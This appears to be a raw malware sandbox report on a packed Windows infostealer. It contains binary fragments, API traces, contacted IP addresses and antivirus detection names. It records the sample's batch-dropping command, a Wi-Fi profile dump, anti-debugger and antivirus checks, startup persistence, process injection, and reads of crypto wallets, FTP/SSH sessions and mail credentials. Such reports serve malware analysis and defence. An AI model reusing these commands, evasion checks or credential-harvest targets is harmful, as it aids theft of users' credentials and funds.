H ܛHƒÄ(éà ÌÌÌHƒì(A¸Hç]H ¿è# H œHƒÄ(éëß ÌÌÌHƒì(A¸HÏ]H €½èó H \œHƒÄ(é»ß ÌÌÌHƒì(A¸ H·]H ð¸èà H œœHƒÄ(é‹ß ÌÌÌHƒì(A¸H—]H à´è“ H ܜHƒÄ(é[ß ÌÌÌHƒì(A¸Ho]H 0¿èc H HƒÄ(é+ß ÌÌÌHƒì(A¸HG]H à·è3 H \HƒÄ(éûÞ ÌÌÌHƒì(A¸H]H °µè H œHƒÄ(éËÞ ÌÌÌHƒì(A¸Hÿ\H ³èÓ H ܝHƒÄ(é›Þ ÌÌÌHƒì(A¸Hß\H P¯è£ H žHƒÄ(ékÞ ÌÌÌHƒì(A¸ HÏ\H À¸ès H \žHƒÄ(é;Þ ÌÌÌHƒì(A¸0H¯\H ½èC H œžHƒÄ(é Þ ÌÌÌ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÈùïPŒ˜Œ˜Œ˜˜ó‚†˜˜ó„˜˜ó…ž˜Þí…ƒ˜Þ킝˜Þí„­˜˜ó€‹˜Œ˜€혁@툏˜@큍˜@í~˜@탍˜RichŒ˜PELËgà! D¶€p`@@Íœ¬ÍPø l»8¨»@`L.text†CD `.rdata*u`vH@@.data à¾@À.rsrcøÒ@@.reloc Ô@Bj h˜®¹`èèŸMh)è [YÃÌÌÌj h¼®¹xèèMhð)èêZYÃÌÌÌjhஹèè_MhP*èÊZYÃÌÌÌj h讹¨èè?Mh°*èªZYÃÌÌÌjh ¯¹ÀèèMh+èŠZYÃÌÌÌjh ¯¹ØèèÿLhp+èjZYÃÌÌÌjh=¯¹ðèèßLhÐ+èJZYÃÌÌÌjh=¯¹éè¿Lh0,è*ZYÃÌÌÌjh=¯¹ éèŸLh,è ZYÃÌÌÌjh=¯¹8éèLhð,èêYYÃÌÌÌjh@¯¹Péè_LhP-èÊYYÃÌÌÌjhL¯¹héè?Lh°-èªYYÃÌÌÌjhX¯¹€éèLh.èŠYYÃÌÌÌjhd¯¹˜éèÿKhp.èjYYÃÌÌÌj$hp¯¹°éèßKhÐ.èJYYÃÌÌÌjh˜¯¹Èéè¿Kh0/è*YYÃÌÌÌj h¬¯¹àéèŸKh/è YYÃÌÌÌjhЯ¹øéèKhð/èêXYÃÌÌÌj hð¯¹êè_KhP0èÊXYÃÌÌÌjh°¹(êè?Kh°0èªXYÃÌÌÌjh °¹@êèKh1èŠXYÃÌÌÌjh °¹XêèÿJhp1èjXYÃÌÌÌj h,°¹pêèßJhÐ1èJXYÃÌÌÌjLh@°¹ˆêè¿Jh02è*XYÃÌÌÌjh°¹ êèŸJh2è XYÃÌÌÌjdh°°¹¸êèJhð2èêWYÃÌÌÌjh±¹Ðêè_JhP3èÊWYÃÌÌÌjh,±¹èêè?Jh°3èªWYÃÌÌÌj hH±¹ëèJh4èŠWYÃÌÌÌj hX±¹ëèÿIhp4èjWYÃÌÌÌj(hh±¹0ëèßIhÐ4èJWYÃÌÌÌj h”±¹Hëè¿Ih05è*WYÃÌÌÌj h¤±¹`ëèŸIh5è WYÃÌÌÌjh´±¹xëèIhð5èêVYÃÌÌÌjhÀ±¹ëè_IhP6èÊVYÃÌÌÌj hܱ¹¨ëè?Ih°6èªVYÃÌÌÌj,hì±¹ÀëèIh7èŠVYÃÌÌÌjh²¹ØëèÿHhp7èjVYÃÌÌÌj h8²¹ðëèßHhÐ7èJVYÃÌÌÌj$hH²¹ìè¿Hh08è*VYÃÌÌÌjhp²¹ ìèŸHh8è VYÃÌÌÌjh„²¹8ìèHhð8èêUYÃÌÌÌjh²¹Pìè_HhP9èÊUYÃÌÌÌjhœ²¹hìè?Hh°9èªUYÃÌÌÌjh°²¹€ìèHh:èŠUYÃÌÌÌjh=¯¹˜ìèÿGhp:èjUYÃÌÌÌj hȲ¹°ìèßGhÐ:èJUYÃÌÌÌjhز¹Èìè¿Gh0;è*UYÃÌÌÌjhð²¹àìèŸGh;è UYÃÌÌÌj hü²¹øìèGhð;èêTYÃÌÌÌjLh@°¹íè_GhP<èÊTYÃÌÌÌjhð²¹(íè?Gh°<èªTYÃÌÌÌjdh°°¹@íèGh=èŠTYÃÌÌÌjh ³¹XíèÿFhp=èjTYÃÌÌÌjh ³¹píèßFhÐ=èJTYÃÌÌÌj h4³¹ˆíè¿Fh0>è*TYÃÌÌÌjhD³¹ íèŸFh>è TYÃÌÌÌjhL³¹¸íèFhð>èêSYÃÌÌÌjhT³¹Ðíè_FhP?èÊSYÃÌÌÌjh\³¹èíè?Fh°?èªSYÃÌÌÌjhh³¹îèFh@èŠSYÃÌÌÌjht³¹îèÿEhp@èjSYÃÌÌÌj h”³¹0îèßEhÐ@èJSYÃÌÌÌj0h¤³¹Hîè¿Eh0Aè*SYÃÌÌÌj hس¹`îèŸEhAè SYÃÌÌÌjhè³¹xîèEhðAèêRYÃÌÌÌjhô³¹îè_EhPBèÊRYÃÌÌÌj<h´¹¨îè?Eh°BèªRYÃÌÌÌj0h@´¹ÀîèEhCèŠRYÃÌÌÌjht´¹ØîèÿDhpCèjRYÃÌÌÌj4h€´¹ðîèßDhÐCèJRYÃÌÌÌj8h¸´¹ïè¿Dh0Dè*RYÃÌÌÌjhô´¹ ïèŸDhDè RYÃÌÌÌj<hµ¹8ïèDhðDèêQYÃÌÌÌj4h@µ¹Pïè_DhPEèÊQYÃÌÌÌj hxµ¹hïè?Dh°EèªQYÃÌÌÌj@hˆµ¹€ïèDhFèŠQYÃÌÌÌj8h̵¹˜ïèÿChpFèjQYÃÌÌÌj h¶¹°ïèßChÐFèJQYÃÌÌÌj4h¶¹Èïè¿Ch0Gè*QYÃÌÌÌj,hP¶¹àïèŸChGè QYÃÌÌÌj h€¶¹øïèChðGèêPYÃÌÌÌj4h¶¹ðè_ChPHèÊPYÃÌÌÌj(hȶ¹(ðè?Ch°HèªPYÃÌÌÌj hô¶¹@ðèChIèŠPYÃÌÌÌj4h·¹XðèÿBhpIèjPYÃÌÌÌj(h<·¹pðèßBhÐIèJPYÃÌÌÌjhh·¹ˆðè¿Bh0Jè*PYÃÌÌÌj<ht·¹ ðèŸBhJè PYÃÌÌÌj0h´·¹¸ðèBhðJèêOYÃÌÌÌjhè·¹Ððè_BhPKèÊOYÃÌÌÌj<hô·¹èðè?Bh°KèªOYÃÌÌÌj4h4¸¹ñèBhLèŠOYÃÌÌÌjhl¸¹ñèÿAhpLèjOYÃÌÌÌj0hx¸¹0ñèßAhÐLèJOYÃÌÌÌj(h¬¸¹Hñè¿Ah0Mè*OYÃÌÌÌ
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x00552c00', u'virtual_address': u'0x0000c000', u'entropy': 7.996159812904994, u'name': u'.rsrc', u'virtual_size': u'0x00553000'} entropy 7.9961598129 description A section with a high entropy has been found
entropy 0.994073128476 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
process system
cmdline C:\Windows\System32\cmd.exe /c expand Go.pub Go.pub.bat & Go.pub.bat
cmdline expand Go.pub Go.pub.bat
cmdline "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
cmdline tasklist
cmdline netsh wlan show profiles
buffer Buffer with sha1: 76c69c08279d2fbed4a97a116284836c164f9a8b
buffer Buffer with sha1: b85cef20e67c34deccf1a92ce56022ecf9434c66
host 176.113.115.6
host 176.113.115.7
host 185.125.50.8
host 185.215.113.16
host 185.215.113.209
host 185.215.113.97
host 45.93.20.28
host 45.33.6.223
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
file \??\SICE
file \??\SIWVID
file \??\NTICE
Time & API Arguments Status Return Repeated

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: Registry Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: Registry Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs
file C:\Windows\Tasks\rapes.job
file C:\Windows\Tasks\futors.job
file C:\Windows\Tasks\Gxtuum.job
file C:\Users\test22\AppData\Roaming\Electrum\wallets
file C:\Users\test22\AppData\Roaming\Litecoin\wallets
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
file C:\Users\test22\AppData\Local\Temp\10001960101\cronikxqqq.exe
file C:\Windows\Microsoft.NET\Framework64\v4.0.30319\.purple\accounts.xml
file C:\Windows\.purple\accounts.xml
file C:\Python27\.purple\accounts.xml
file C:\Windows\System32\.purple\accounts.xml
file C:\Users\test22\AppData\Local\Temp\845cfbab99\.purple\accounts.xml
file C:\.purple\accounts.xml
file C:\SystemRoot\System32\.purple\accounts.xml
file C:\Program Files (x86)\Internet Explorer\.purple\accounts.xml
file C:\Windows\Microsoft.NET\Framework\v4.0.30319\.purple\accounts.xml
file C:\Users\test22\AppData\Local\Temp\bb556cff4a\.purple\accounts.xml
file C:\Program Files (x86)\Microsoft Office\Office15\.purple\accounts.xml
file C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\.purple\accounts.xml
file C:\Users\test22\AppData\Roaming\.purple\accounts.xml
file C:\Windows\SysWOW64\.purple\accounts.xml
file C:\Program Files (x86)\EditPlus\.purple\accounts.xml
file C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE15\.purple\accounts.xml
Time & API Arguments Status Return Repeated

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: ????? ?? 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: ????? ?? 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java 8 Update 131
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java Auto Updater
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Excel MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft PowerPoint MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Publisher MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Outlook MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Word MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - English
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Outils de vérification linguistique 2013 de Microsoft Office - Français
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - Español
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft InfoPath MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft DCF MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft OneNote MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Groove MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM UX MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Lync MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Acrobat Reader DC MUI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0
file C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Server
registry HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Server
Process injection Process 1800 resumed a thread in remote process 1972
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000013c
suspend_count: 0
process_identifier: 1972
1 0 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed 64 8f 05 00 00 00 00 56 54 e9 78 09 00 00 bb
exception.symbol: 1n22o8+0x1faff4
exception.instruction: in eax, dx
exception.module: 1N22O8.exe
exception.exception_code: 0xc0000096
exception.offset: 2076660
exception.address: 0x40aff4
registers.esp: 2162012
registers.edi: 10498088
registers.eax: 1447909480
registers.ebp: 3992645652
registers.edx: 22104
registers.ebx: 1971327157
registers.esi: 4229001
registers.ecx: 20
1 0 0
dead_host 185.215.113.97:80
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Generic.4!c
Cynet Malicious (score: 99)
CAT-QuickHeal Trojan.Ghanarava.1741391711d0c3c0
Skyhigh BehavesLike.Win32.AgentTesla.tc
Cylance Unsafe
VIPRE Gen:Heur.Crifi.1
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
BitDefender Gen:Heur.Crifi.1
Arcabit Trojan.Crifi.1
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/Packed.Themida.HZB
APEX Malicious
Avast Win32:AdwareX-gen [Adw]
ClamAV Win.Packed.Disabler-10009296-0
Kaspersky UDS:Trojan.Win32.Generic
Alibaba TrojanDownloader:Win32/Strab.12849834
MicroWorld-eScan Gen:Heur.Crifi.1
Rising Trojan.Agent!1.10760 (CLASSIC)
Emsisoft Gen:Heur.Crifi.1 (B)
F-Secure Trojan.TR/Crypt.TPM.Gen
DrWeb Trojan.Packed2.48355
Zillya Trojan.AgentGen.Win32.94
McAfeeD ti!D53213608278
Trapmine malicious.moderate.ml.score
CTX exe.unknown.crifi
Sophos Mal/Generic-S
SentinelOne Static AI - Malicious SFX
FireEye Generic.mg.4677605b34f1e7f4
Google Detected
Avira TR/Crypt.TPM.Gen
Kingsoft Win32.Trojan.Generic.a
Gridinsoft Spy.Win32.Redline.lu!heur
Microsoft Trojan:Win32/Vigorf.A
GData Gen:Heur.Crifi.1
Varist W32/Kryptik.JKR.gen!Eldorado
McAfee Artemis!CE7FC75DAB76
DeepInstinct MALICIOUS
Malwarebytes Disabler.Trojan.MSIL.DDS
